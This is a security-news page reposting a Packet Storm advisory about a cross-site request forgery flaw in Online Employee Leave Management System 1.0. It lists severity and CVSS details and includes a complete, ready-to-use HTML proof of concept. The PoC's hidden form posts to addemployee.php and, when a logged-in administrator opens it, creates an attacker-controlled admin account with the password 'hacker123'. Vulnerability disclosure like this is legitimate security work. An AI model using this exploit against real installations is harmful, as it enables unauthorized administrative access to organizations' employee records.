Security
Headlines
HeadlinesLatestCVEs

Headline

Online Employee Leave Management System 1.0 Cross Site Request Forgery

Online Employee Leave Management System version 1.0 suffers from a cross site request forgery vulnerability.

Packet Storm
#csrf#vulnerability#linux#php#auth
# Exploit Title: Online Employee Leave Management System 1.0 - Cross-Site Request Forgery (addemployee.php)# Date: 05/09/2022# Exploit Author: Amolo Hunters# Software Link: https://www.sourcecodester.com/php/15374/online-employee-leave-management-system-php-free-source-code.html# Version: 1.0# Tested on: LinuxTitle:================Online Employee Leave Management System 1.0 - Cross-Site Request Forgery (addemployee.php)Summary:================The Online Employee Leave Management System suffers from a vulnerability called Cross-Site Request Forgery that affects the addemployee.php application used to add employees with administrative privileges. By failing to block against this attack, malicious users can take advantage of this weakness to spoof a request leading to the creation of a new account with administrative privileges.Severity Level:================5.4 (Medium)CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:NAffected Product:================Online Employee Leave Management System v1.0Steps to Reproduce:================1. Create an HTML file and paste the following code:<html><title>Online Employee Leave Management System (addemployee.php) CSRF PoC</title><center><h1>Online Employee Leave Management System (addemployee.php) CSRF PoC</h1><p>by Amolo Hunters</p><form action="http://target.com/elms/admin/addemployee.php" method="POST"><input type="hidden" name="empcode" value="1337" /><input type="hidden" name="firstName" value="AmoloHT" /><input type="hidden" name="lastName" value="PoC" /><input type="hidden" name="email" value="[email protected]" /><input type="hidden" name="password" value="hacker123" /><input type="hidden" name="confirmpassword" value="hacker123" /><input type="hidden" name="gender" value="Other" /><input type="hidden" name="dob" value="3 June, 2022" /><input type="hidden" name="department" value="Information Technology" /><input type="hidden" name="country" value="Brazil" /><input type="hidden" name="city" value="PoC" /><input type="hidden" name="address" value="PoC" /><input type="hidden" name="mobileno" value="0000000000" /><input type="hidden" name="add" value="" /><input type="submit" value="Submit request" /></form></center></html>2. Save the file and run it in the browserNote: you need to be logged in as an administrator

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution